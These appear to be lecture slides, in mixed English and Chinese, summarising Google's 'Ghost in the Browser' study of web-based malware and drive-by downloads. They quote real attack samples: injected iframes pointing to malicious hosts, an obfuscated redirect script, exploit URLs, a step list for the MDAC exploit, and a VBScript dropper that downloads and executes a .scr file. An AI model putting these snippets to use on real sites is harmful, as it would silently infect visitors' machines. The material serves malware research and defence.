niels provos, dean mcnamee, panayiotis mavrommatis, ke wang and nagendra modadugu google, inc

The Ghost In The BrowserAnalysis of Web-based Malware

Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra ModaduguGoogle, Inc.

Preface

Google現有的大量資料

Google與Microsoft

Introduction

本篇描述一個新的趨勢 : 用Web-based的方式來達成 exploits.

Unlike traditional botnets that use push-based infection, web-based malware infection follows a pull-based model, creating botnet-like structures.

從 2006年 3月用 12個月的時間 ,蒐集這段時間的資料

Related Works

Alex Moshchuk: http://research.microsoft.com/en-us/people/alexmos/

He showed a decrease in drive-by-downloads over time.

資料少

Related Works

HoneyMonkey: 較細 , 個案Specific vulnerabilitieshttp://research.microsoft.com/en

-us/um/people/ymwang/

Definition of Malicious of This Paper

A web page is deemed malicious, if it causes the automatic installation of software without the user’s knowledge or consent.

Detecting Dangerous Web Pages

not attempt to investigate the actual behavior of the installed software, but rather identify the mechanisms used to introduce the software into the system via the browser.

Detection architecture

MapReduce

用MapReduce處理大量 URL & all links to potential exploit URLs

最後得出malware URLs(Pages)

Monitor and Analysis

1. A new processes being started.2. Registry and file system changes.

Scores to each recorded component: use different anti-virus engines.

And sum all score as total score. 以上是大概的方式 , 詳細的它沒講

Peak performance 300,000(30萬 )

URLs

Total 4.5million URLs 450,000 URLs were engaging in

drive-by-downloads. About 10% of the URLs were

malicious

Inject malicious content on popular web sites

web server security user contributed content advertising third-party widgets

Web Server Security

Scripting applications(網頁套件 , 模組 ) phpBB2 InvisionBoard

Invision Power Board

<!-- Copyright Information --><div align=’center’ class=’copyright’>Powered by<a href="http://www.invisionboard.com">Invision Power

Board</a>(U)v1.3.1 Final &copy; 2003 &nbsp;<a href=’http://www.invisionpower.com’>IPS, Inc.</a></div></div><iframe

src=’http://wsfgfdgrtyhgfd.net/adv/193/new.php’></iframe>

<iframe src=’http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193’></iframe>

User Contributed Content

Permit posts, and allow to insert arbitrary HTML.(可讓別人留言的網頁 , 允許 html) <iframe> <script>

Though Limited HTML support, but …

<SCRIPT language=JavaScript>function otqzyu(nemz)juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="

(’";awq27="";sftfttft=4;fghdh="’ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om’";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15

="’)";if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+ uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//</SCRIPT>

De-obfuscating

location.replace(’http://videozfree.com’)

Advertising

廣告租借

Third-Party Widgets

計數器 Another example: iframemoney.org

Example

<!-- Begin Stat Basic code --><script language="JavaScript"src="http://m1.stat.xx/basic.js"></script><script language="JavaScript"><!--statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);// --></script> <noscript><a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA"><img src="http://m1.stat.xx/n?

id=ST8BidmAHKthtwoWA"border="0" nosave width="18"

height="18"></a></noscript><!-- End Stat Basic code -->

d.write("<scr"+"ipt language=’JavaScript’type=’text/javascript’src=’http://m1.stats4u.yy/md.js?country=us&id="+ id +"&_t="+(new Date()).getTime()+"’></scr"+"ipt>")

Trigger another exploit code

http://expl.info/cgi-bin/ie0606.cgi?homepagehttp://expl.info/demo.phphttp://expl.info/cgi-bin/ie0606.cgi?type=MS03-

11&SP1http://expl.info/ms0311.jarhttp://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-

11http://dist.info/f94mslrfum67dh/winus.exe

Microsoft Security Bulletin MS03-011: A flaw in Microsoft VM Could Enable System Compromise.

Exploitation Mechanisms

first needs to gain control over a user’s system:傳統 : finding vulnerable network services

and remotely exploiting them. NAT, Firewall

Now: Lure users to connect to malicious servers.

傳統的方式受到限制 , 而用web server(網頁 )&drive by download.

Once a vulnerability has been discovered, an adversary can choose an appropriate exploit and ask the web browser to download it.

Exploiting Software

In Browser Launched external programs Download, store and then execute a

malware binary.(drive-by-download)

Microsoft’s Data Access Components

http://www.microsoft.com/taiwan/technet/security/bulletin/ms06-014.mspx

Javascript can reliably accomplish.分析這一種比較困難 , 例如 : 只能下載一次 ,後來就變空的

Example

The following example illustrates the steps taken by an adversaryto leverage this vulnerability into remote code execution:

• The exploit is delivered to a user’s browser via aniframe on a compromised web page.• The iframe contains Javascript to instantiate an ActiveXobject that is not normally safe for scripting.• The Javascript makes an XMLHTTP request to retrievean executable.• Adodb.stream is used to write the executable to disk.• A Shell.Application is used to launch the newly writtenexecutable.

A twenty line Javascript can reliably accomplish this sequenceof steps to launch any binary on a vulnerable installation.

WebViewFolderIcon

Heap spraying Code here: http://

forum.eviloctal.com/archiver/tid-25077.html

Use Javascript to catalog IE or Firefox

Also version of JVM Patches to OS

EX: http://blog.yam.com/visioncan/article/10598530

<script>window.env=new function(){    this.isOpera=(window.opera&&navigator.userAgent.match(/opera/gi))?true:false;    this.isIE=(!this.isOpera&&document.all&&navigator.userAgent.match(/msie/gi))?true:false;    this.isSafari=(!this.isIE&&navigator.userAgent.match(/safari/gi))?true:false;    this.isGecko=(!this.isIE&&navigator.userAgent.match(/gecko/gi))?true:false;    this.isFirefox=(!this.isIE&&navigator.userAgent.match(/firefox/gi))?true:false;};//=====================var s = "";for (var i in env) {    s += i + " : " + env[i] + "\n";}alert(s);</script>

EX: http://demo.tc/Post/366

<script type="text/javascript">     var isIE = navigator.userAgent.search("MSIE") > -1;     var isIE7 = navigator.userAgent.search("MSIE 7") > -1;     var isFirefox = navigator.userAgent.search("Firefox") > -1;     var isOpera = navigator.userAgent.search("Opera") > -1;     var isSafari = navigator.userAgent.search(“Safari”) > -1;//Google瀏覽器是用這核心     if (isIE7) {         alert('isIE7');     }     if (isIE) {         alert('isIE');     }     if (isFirefox) {         alert('isFirefox');     }     if (isOpera) {         alert('isOpera');     }     if (isSafari) {         alert('isSafari');     }         </script>

JVM EX: http://forums.sun.com/thread.jspa?threadID=547717

alert("javaEnabled "+ window.navigator.javaEnabled());alert("java version "+

java.lang.System.getProperty("java.version"));

Tricking the User

騙人下載且執行

codec (解碼器 )

Obfuscation

教學 http://anti-hacker.blogspot.com/2008/02/javascript7.html

如此用 Javascript 可逃過偵測另外有聲譽的一些網站也用了

obfuscation, 所以用此判斷會有 false positive.

Example

document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o...%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));//--></SCRIPT>-------------------------------------------------------------------------------------<SCRIPT LANGUAGE="Javascript"><!--/* criptografado pelo Fal - [...]document.write(unescape("%0D%0A%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A

%20%20...D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%3C/html%3E"));//--></SCRIPT>

<script language="VBScript">on error resume nextdl = "http://foto02122006.xxx.ru/foto.scr"Set df = document.createElement("object")df.setAttribute "classid",

"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"str="Microsoft.XMLHTTP"Set x = df.CreateObject(str,"")

...S.closeset Q = df.createobject("Shell.Application","")Q.ShellExecute fname1,"","","open",0

</script>

Malware Classfication

用 antivirus軟體分類 , 以下 3類 : Trojan: 一般安裝的手法 Adware: 跑廣告出來的軟體 Unknown/Obfuscated: 不確定的

200,000 unique malware binaries Assumed that two binaries are

different if their cryptographic digests(hashes) are different. Why use the method?(如此分別 unique的原因 )▪ Based on structural similarities or the exploit

they use is expensive.▪ No readily available tools

Malware family Percentage

Malware Analysis

Adware and Trojans are the most prevalent malware categories

For adware, Trymedia and NewDotNet are the most common providers of Adware.

For Trojans, Trojan downloaders and banking Trojans are the most common.

Trymedia

Trymedia is an adware that infects your computer through peer-to-peer networks, shareware programs and some websites.

It monitors your surfing activity, especially your shopping and banking habits, collects this information and sends it to the Trymedia server.

Based on this information your computer is bombarded with ad pop-ups.

NewDotNet

It tracks what websites a person visits and then pops up separate browser windows with targeted advertisements and special offers.

It continuously is downloading updated information about new offers and collects a variety of information.

http://blog.xuite.net/reptile/diary/4539739

Trojan downloader

Usually a bootstrap to download other arbitrary binaries onto a machine.

Banking Trojans

steal sensitive information such as bank account numbers and corresponding passwords.

The extracted information is often sent back to the adversary via throw-away email accounts.

With unique URLs

Trojan 最多 , over 300,000

人工的方式檢測不是 browser發出的HTTP request: Majority▪ Pop-up ad▪ Rank inflation

Some cases▪ Receive binary updates and instructions▪ the anti-virus engines provided a classification, the

binaries were labeled either as Trojan or Worm.

Remotely Linked Exploits

the majority of the exploits were hosted on third-party servers and not on the compromised web sites.

The attacker had managed to compromise the web site content to point towards an external URL hosting the exploit either via iframes or external JavaScript.

Or, less popular, completely redirect to another malicious site.

Number of pointing to exploit URLs

Number of pointing to exploit URLs

The reason(The advantage of remotely exploits)

1. Ease of management2. Having points to a single site offers

an aggregation point to monitor and generate statistics.

3. Able to update the portfolio of exploits by just changing a single web page.

分流…

Malware evolution

防止 anti-vire software偵測最快的差不多每小時更新 (改變 )一次

Discussion

We expect that the majority of malware is no longer spreading via remote exploitation but rather as we indicated in this paper via web-based infection.

This rationale can be motivated by the fact that the computer of an average user provides a richer environment for adversaries to mine, for example, it is more likely to find banking transactions and credit card numbers on a user’s machine than on a compromised server.

Conclusion

1. identify the four prevalent mechanisms used to inject malicious content on popular web sites.

2. a large number of malicious web pages responsible for malware infections and found evidence that web-based malware creates botnet-like structures in which compromised machines query web servers periodically for instructions and updates.

3. malware binary change frequently.4. achieve better exposure and more reliability,

malware binaries are often distributed across a large number of URLs and domains.